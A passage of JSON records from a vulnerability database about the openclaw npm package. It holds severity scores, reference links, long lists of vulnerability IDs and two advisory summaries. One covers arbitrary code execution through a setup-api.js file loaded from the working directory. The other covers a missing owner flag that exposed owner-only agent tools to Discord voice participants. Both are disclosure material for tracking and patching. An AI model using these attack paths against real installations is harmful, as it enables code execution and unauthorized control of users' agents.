boundaries.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qvr7-g57c-mrc7","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qvr7-g57c-mrc7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32970","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32970"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-credential-fallback-logic-bypass-via-unavailable-local-auth-secretrefs","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-credential-fallback-logic-bypass-via-unavailable-local-auth-secretrefs"},{"reference_url":"https://github.com/advisories/GHSA-vm29-7mq3-9jrg","reference_id":"GHSA-vm29-7mq3-9jrg","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vm29-7mq3-9jrg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-vm29-7mq3-9jrg"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dsvn-dpb5-tfdz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94834?format=json","vulnerability_id":"VCID-dv5s-pvw1-a7fu","summary":"OpenClaw vulnerable to arbitrary code execution via attacker-controlled setup-api.js loaded from cwd during env-key resolution\n## Summary\n\nOpenClaw's bundled plugin setup resolver could fall back to `process.cwd()` while resolving provider setup metadata. If a user ran an OpenClaw command from an attacker-controlled repository containing `extensions/<plugin>/setup-api.js`, OpenClaw could load and execute that JavaScript during ordinary provider/model status resolution.\n\n## Impact\n\nThis is arbitrary JavaScript execution in the OpenClaw process under the current user account. A malicious repository could run code when the user executed commands such as provider/model inspection from that directory. The issue does not require gateway network exposure, but it does require user interaction: the user must run OpenClaw from a directory containing the attacker-controlled setup file.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nOpenClaw now resolves bundled setup fallbacks only from the canonical package/repository root and no longer includes `process.cwd()` as a trusted setup-api search root. A regression test verifies that a workspace-local `extensions/<plugin>/setup-api.js` is not loaded through provider setup resolution.\n\n## Fix Commit(s)\n\n- `993781e6e6eaf50f033cfc3e3bf4f47059740707` (`fix(plugins): ignore cwd setup-api fallback`)\n\n## Severity\n\nSeverity remains `high` because successful exploitation allows arbitrary code execution under the user running OpenClaw. The CVSS vector is local/user-interaction scoped rather than network-only because the victim must run OpenClaw from an attacker-controlled directory.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45004","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0286","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02815","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02869","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45004"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/993781e6e6eaf50f033cfc3e3bf4f47059740707","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/993781e6e6eaf50f033cfc3e3bf4f47059740707"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r39h-4c2p-3jxp","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r39h-4c2p-3jxp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45004","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45004"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-setup-api-js-in-current-working-directory","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-setup-api-js-in-current-working-directory"},{"reference_url":"https://github.com/advisories/GHSA-r39h-4c2p-3jxp","reference_id":"GHSA-r39h-4c2p-3jxp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r39h-4c2p-3jxp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114733?format=json","purl":"pkg:npm/openclaw@2026.4.23","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23"}],"aliases":["CVE-2026-45004","GHSA-r39h-4c2p-3jxp"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dv5s-pvw1-a7fu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50595?format=json","vulnerability_id":"VCID-dzmz-c5en-5qeq","summary":"OpenClaw: Discord voice transcript owner-flag omission could expose owner-only tools in mixed-trust channels\nIn `openclaw@2026.3.1`, the Discord voice transcript path called `agentCommand(...)` without `senderIsOwner`, and `agentCommand` defaults missing `senderIsOwner` to `true`.\n\nThis could allow a non-owner voice participant in the same channel to reach owner-only tool surfaces (`gateway`, `cron`) during voice transcript turns.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32035","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12467","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12504","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12502","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32035"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-owner-flag-validation-in-discord-voice-transcript-handler","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:54:53Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-owner-flag-validation-in-discord-voice-transcript-handler"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32035","reference_id":"CVE-2026-32035","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32035"},{"reference_url":"https://github.com/advisories/GHSA-wpg9-4g4v-f9rc","reference_id":"GHSA-wpg9-4g4v-f9rc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wpg9-4g4v-f9rc"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wpg9-4g4v-f9rc","reference_id":"GHSA-wpg9-4g4v-f9rc","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H